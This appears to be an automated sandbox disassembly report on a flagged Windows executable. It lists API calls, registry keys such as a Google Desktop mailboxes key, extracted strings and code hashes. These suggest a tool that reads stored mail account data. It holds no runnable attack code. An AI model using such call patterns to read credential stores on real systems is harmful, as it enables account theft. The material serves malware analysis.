                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                  • sprintf.MSVCRT ref: 00409A4A
                  Strings
                  • <%s>, xrefs: 00409A44
                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409A18
                  Yara matches
                  Similarity
                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                  • API String ID: 3202206310-1998499579
                  • Opcode ID: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                  • Instruction ID: e71924cd66665c82b0e0cf5586ba0e292e849e53f6e9b6834f4978a1b65f22f6
                  • Opcode Fuzzy Hash: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                  • Instruction Fuzzy Hash: B601A7B2A001296AD720A655DC45FDB7A6C9F54704F0400FAB609F7182D7B8AA94CBA9
                  APIs
                  Yara matches
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 918acd96936b96677d6dbe6e32eca864f76218b4922cdd818d5aaac1fd27dc8a
                  • Instruction ID: 072aa514f388f074079b8f328b082be18a1f899df3a3abdece790e68ac814aea
                  • Opcode Fuzzy Hash: 918acd96936b96677d6dbe6e32eca864f76218b4922cdd818d5aaac1fd27dc8a
                  • Instruction Fuzzy Hash: 97F0F4725057115FDB309FB99EC055BBBD5BB08714760093FF28AD3641CB79A890C618
                  APIs
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040875D
                  • ??3@YAXPAX@Z.MSVCRT ref: 00408770
                  • ??3@YAXPAX@Z.MSVCRT ref: 00408783
                  • ??3@YAXPAX@Z.MSVCRT ref: 00408796
                  • free.MSVCRT(00000000), ref: 004087AA
                    • Part of subcall function 00406B8A: free.MSVCRT(00000000,00406F4C,00000000,?,?), ref: 00406B91
                  Yara matches
                  Similarity
                  • API ID: ??3@$free
                  • String ID:
                  • API String ID: 2241099983-0
                  • Opcode ID: 5868bb771c4ecc0bf5a1b6b5d500adaf89535c259bb090c2cea9b7557de00de1
                  • Instruction ID: 36c0512d224ac042a94a08cc7a852a1772878ff9935cd33c5980a4446e7632c9
                  • Opcode Fuzzy Hash: 5868bb771c4ecc0bf5a1b6b5d500adaf89535c259bb090c2cea9b7557de00de1
                  • Instruction Fuzzy Hash: 8CF0A4729025306F89313B325A01A4EB7A47D5472932A026FF90ABB3858F7D6C60C5DD
                  APIs
                    • Part of subcall function 004062DB: memset.MSVCRT ref: 004062FB
                    • Part of subcall function 004062DB: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                    • Part of subcall function 004062DB: _stricmp.MSVCRT(00000000,edit), ref: 00406320
                  • SetBkMode.GDI32(?,00000001), ref: 0040EEB2
                  • GetSysColor.USER32(00000005), ref: 0040EEBA
                  • SetBkColor.GDI32(?,00000000), ref: 0040EEC4
                  • SetTextColor.GDI32(?,00C00000), ref: 0040EED2
                  • GetSysColorBrush.USER32(00000005), ref: 0040EEDA
                  Yara matches
                  Similarity
                  • API ID: Color$BrushClassModeNameText_stricmpmemset
                  • String ID:
                  • API String ID: 1869857563-0
                  • Opcode ID: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                  • Instruction ID: 03c420b3e6d9e2244e0390b53f734bb3cf914c92d54749bbcb6c05866cd8fc50
                  • Opcode Fuzzy Hash: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                  • Instruction Fuzzy Hash: 5BF08131140109BBDF116FA6EC09B9E3F69EF08712F10843AFA19641F1CB759A209B58
                  APIs
                  • BeginDeferWindowPos.USER32(0000000B), ref: 00405D11
                    • Part of subcall function 00401645: GetDlgItem.USER32(?,?), ref: 00401655
                    • Part of subcall function 00401645: GetClientRect.USER32(?,?), ref: 00401667
                    • Part of subcall function 00401645: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 004016D1
                  • EndDeferWindowPos.USER32(?), ref: 00405DE2
                  • InvalidateRect.USER32(?,?,00000001), ref: 00405DED
                  Strings
                  Yara matches
                  Similarity
                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                  • String ID: $
                  • API String ID: 2498372239-3993045852
                  • Opcode ID: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                  • Instruction ID: 9c87de9d9a27f98487306a7e65f23cb02f8420b0a21639e15617240473fc85a4
                  • Opcode Fuzzy Hash: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                  • Instruction Fuzzy Hash: CC314C30641254BBCB216F678C4DD8F7E7DEF86BA8F104479B406752A2D6758E00DAA8
                  APIs
                    • Part of subcall function 00401E4A: memset.MSVCRT ref: 00401E6C
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E85
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E93
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401ED9
                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401EE7
                  • _stricmp.MSVCRT(/stext,0041344F,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BB0B
                  Strings
                  Yara matches
                  Similarity
                  • API ID: strlen$_stricmpmemset
                  • String ID: /stext$O4A$O4A
                  • API String ID: 3575250601-3624624124
                  • Opcode ID: 7f0e710687395444cd0f3a313f6498683b374fdeb7e5e26100ad8a4f5dd32849
                  • Instruction ID: f8692cde8425b7317fc14f1eb66aa5838d4e8645dd66f9f31b24f8adae3a6e9d
                  • Opcode Fuzzy Hash: 7f0e710687395444cd0f3a313f6498683b374fdeb7e5e26100ad8a4f5dd32849
                  • Instruction Fuzzy Hash: 20213E707141119FC368AF29C8D1A66B3A8FB04318B15827FE41AA7692C779EC518BCD
                  APIs
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 00407341
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 0040738F
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004073AC
                  Strings
                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00407319
                  Yara matches
                  Similarity
                  • API ID: Close$EnumOpenmemset
                  • String ID: Software\Google\Google Desktop\Mailboxes
                  • API String ID: 2255314230-2212045309
                  • Opcode ID: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                  • Instruction ID: e64120c2db1572d8afbfe90730df88552d052729858ffd3f9c459fe70d1883dc
                  • Opcode Fuzzy Hash: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
                  • Instruction Fuzzy Hash: FE114F72808345BBD720EA52DC02EAB7BECEB84344F04493EBD94D1191E735DA1CDAA7
                  APIs
                  • memset.MSVCRT ref: 0040AEED
                  • SetFocus.USER32(?,?), ref: 0040AF75
                    • Part of subcall function 0040AEB7: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040AEC6
                  Strings
                  Yara matches
                  Similarity
                  • API ID: FocusMessagePostmemset
                  • String ID: @@A$l
                  • API String ID: 3436799508-3245464651
                  • Opcode ID: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                  • Instruction ID: b134d5c547a061a2024b59ce6a2071751047cb74c3ab3f5c012b8dbc43773ba7
                  • Opcode Fuzzy Hash: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
                  • Instruction Fuzzy Hash: E511A5719001588BDF21DB15CD457CB7BA9AF40308F0800F5A94C7B282C7B55A89CFA5
                  APIs
                  • memset.MSVCRT ref: 004085C4
                  • SendMessageA.USER32(?,00001019,00000000,?), ref: 004085F2
                  Strings
                  Yara matches
                  Similarity
                  • API ID: MessageSendmemset
                  • String ID: "$\LA
                  • API String ID: 568519121-1791104459
                  • Opcode ID: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                  • Instruction ID: 63acc278c780c6314b896fe9ea96fe6fcbd724764764ef8c6808a121558323c0
                  • Opcode Fuzzy Hash: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                  • Instruction Fuzzy Hash: 6401D635900204AFDB20DF45CA81AABB7F8FF84749F11842EE891A7241E7359E95CB79
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileNameOpenstrcpy
                  • String ID: <@A$L
                  • API String ID: 812585365-3325948237
                  • Opcode ID: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                  • Instruction ID: 37832acc40b05216fd1420d9404962ea4abb69311e967ef4bad7b399ffdc39fa
                  • Opcode Fuzzy Hash: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                  • Instruction Fuzzy Hash: 9001BDB1D102189FCF50DFA9D9456CEBFF8BB08348F00812AE519E6240EBB885458F98
                  APIs
                    • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                    • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                  • String ID: MS Sans Serif
                  • API String ID: 4251605573-168460110
                  • Opcode ID: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                  • Instruction ID: 87dec32cde48cbcf1a13d2850fc5ac8412a7d38377e852ebd334ba5dd6d4256f
                  • Opcode Fuzzy Hash: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                  • Instruction Fuzzy Hash: 0DF0A771B4030877EB216BA0EC4BF8A7BACAB41F01F148535FA51B51E1D6F5B644CB48
                  APIs
                  • memset.MSVCRT ref: 004062FB
                  • GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                  • _stricmp.MSVCRT(00000000,edit), ref: 00406320
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClassName_stricmpmemset
                  • String ID: edit
                  • API String ID: 3665161774-2167791130
                  • Opcode ID: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                  • Instruction ID: f5117061f2ecbf32e0f2d844d8c4f3ebb38ffa703039f8d1d2413de036cb48d9
                  • Opcode Fuzzy Hash: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
                  • Instruction Fuzzy Hash: 6BE09B72C4412A7EDB21A664EC01FE63BAC9F19705F0001B6B945E1081E6A497C48AA4
                  APIs
                  • LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76F90A60,?,00000000), ref: 0040F42B
                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                  • API String ID: 2574300362-543337301
                  • Opcode ID: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                  • Instruction ID: f6b0fe8b92f076911ecc5568a6e4330759afce426f86003319557fe493e3cfe8
                  • Opcode Fuzzy Hash: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                  • Instruction Fuzzy Hash: 59D092B0642202ABD7208F21AC097827AAAE798706F01C53AA800E12A4FF7895448A5D
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: ed240992573ec86b58d2d50a2916693bc920e5de01bcfd4d726ef5af0379dd19
                  • Instruction ID: e5f264b8724d3d475e9e13978f0762699e8b6218914c988ba7d238899ccfa6da
                  • Opcode Fuzzy Hash: ed240992573ec86b58d2d50a2916693bc920e5de01bcfd4d726ef5af0379dd19
                  • Instruction Fuzzy Hash: 2431E8B0A007009FD750DF3A99856A6FBE5EF84305B25886FD25ACB262D7B8D481CF19
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                  • Instruction ID: 1bd4811e219587db2c743c544c50c2778389369fcaa1acc1f1d0acac3f9f4604
                  • Opcode Fuzzy Hash: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                  • Instruction Fuzzy Hash: D90128B1650B002BD235AB35CD03F6B77A4EB54B14F000B1EF642E66D3D7A8A14489AD
                  APIs
                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004024EB
                  • memset.MSVCRT ref: 004024B4
                    • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                    • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                    • Part of subcall function 0040EFF9: memcpy.MSVCRT ref: 0040F075
                    • Part of subcall function 0040EFF9: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025A3
                  • LocalFree.KERNEL32(?), ref: 004025AD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                  • String ID:
                  • API String ID: 3503910906-0
                  • Opcode ID: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                  • Instruction ID: cfc3eb1076764f39a441947bf0103a86c194fcc0ae6958193510771120a15821
                  • Opcode Fuzzy Hash: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                  • Instruction Fuzzy Hash: 0341A3B1408385BFDB11DE608D44AAB7BDCAB88304F044A7EF588A21C1D679DA44CB5A
                  APIs
                    • Part of subcall function 00408A97: ??2@YAPAXI@Z.MSVCRT ref: 00408AB8
                    • Part of subcall function 00408A97: ??3@YAXPAX@Z.MSVCRT ref: 00408B7F
                  • strlen.MSVCRT ref: 0040A2A9
                  • atoi.MSVCRT ref: 0040A2B7
                  • _mbsicmp.MSVCRT ref: 0040A30A
                  • _mbsicmp.MSVCRT ref: 0040A31D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _mbsicmp$??2@??3@atoistrlen
                  • String ID:
                  • API String ID: 4107816708-0
                  • Opcode ID: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                  • Instruction ID: a4071902e71568577f89ec7532499d814672e4af5b69a40392892895b6c6556c
                  • Opcode Fuzzy Hash: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                  • Instruction Fuzzy Hash: 2F414C35900304ABCB11DFA9C580A9ABBF4FB48308F1085BEEC45EB382D775DA51CB59
                  APIs
                  • strchr.MSVCRT ref: 00409380
                  • strchr.MSVCRT ref: 0040938E
                    • Part of subcall function 00406C0E: strlen.MSVCRT ref: 00406C2A
                    • Part of subcall function 00406C0E: memcpy.MSVCRT ref: 00406C47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strchr$memcpystrlen
                  • String ID: "$O4A
                  • API String ID: 647414859-2470771484
                  • Opcode ID: 9589ded8c9737ad3f073cf670c5b07d51d805ffd3e6e170b8e9921023cefc6bc
                  • Instruction ID: 2a898d4ed32f5f6efaaf06cea6bb2d3476af0f116e7825a2212580dac0848608
                  • Opcode Fuzzy Hash: 9589ded8c9737ad3f073cf670c5b07d51d805ffd3e6e170b8e9921023cefc6bc
                  • Instruction Fuzzy Hash: 27316431908204AFDF14EF65D8419DEBBB8EF59328B20416BEC51F71D2D778AA428E58
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen
                  • String ID: >$>$>
                  • API String ID: 39653677-3911187716
                  • Opcode ID: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                  • Instruction ID: 10e230c6dca09e0a93cf8d60ed085072b0d540c64d6ff1ff1f1df815401d523a
                  • Opcode Fuzzy Hash: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                  • Instruction Fuzzy Hash: 6331E4718492C5AFCB118B6C80417EEFFA24F62304F08869AC2D546353C26DA5CAC39A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                  • Instruction ID: eb902c52722b89a171555a0eccdb346c2cc9b7794a0320b873d5afd3574b0f46
                  • Opcode Fuzzy Hash: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                  • Instruction Fuzzy Hash: 201138B29007096BCB288E25C8809EB77A9EF54344700063FFE0696691E7759E95C7DC
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: 85edfb7e8b992a0ff1249ff66e53eb09c48dce348a16b7b1dc77ea68a0c6e46b
                  • Instruction ID: 17b98b22fb48c4f462205fa6a58e9a56533f9d3233289d57114c66ebe089a08a
                  • Opcode Fuzzy Hash: 85edfb7e8b992a0ff1249ff66e53eb09c48dce348a16b7b1dc77ea68a0c6e46b
                  • Instruction Fuzzy Hash: A6113D716046019FD328DF2DC981A27F7E6FF98304B20892EE59AC7385DA75E841CB55
                  APIs
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00411C87,?,00000000,00411C55,00000000,?,0040D972), ref: 00406D1E
                    • Part of subcall function 00406B54: free.MSVCRT(76F90A60,00000000,76F90A60,00406EF2,00000000,?,?), ref: 00406B63
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 00406D5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$free
                  • String ID: O4A$O4A
                  • API String ID: 1329815435-993042121
                  • Opcode ID: 1ed867b22c69faf8c5b3106cc14bc2b24ab2cc1111c25bf338c9f6b2849c2373
                  • Instruction ID: 1b09f40ed87e73aeb79b4c84c04f27446391d6c1afa5035e0ae74dd7795ddf2a
                  • Opcode Fuzzy Hash: 1ed867b22c69faf8c5b3106cc14bc2b24ab2cc1111c25bf338c9f6b2849c2373
                  • Instruction Fuzzy Hash: 09115EB1B0011A6FDB01EFA9CD80ABF76FCEB08718B114137B915F7291E6749E148BA5
                  APIs
                  • SHGetMalloc.SHELL32(?), ref: 0040F62F
                  • SHBrowseForFolderA.SHELL32(?), ref: 0040F661
                  • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F675
                  • strcpy.MSVCRT(?,?), ref: 0040F688
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: BrowseFolderFromListMallocPathstrcpy
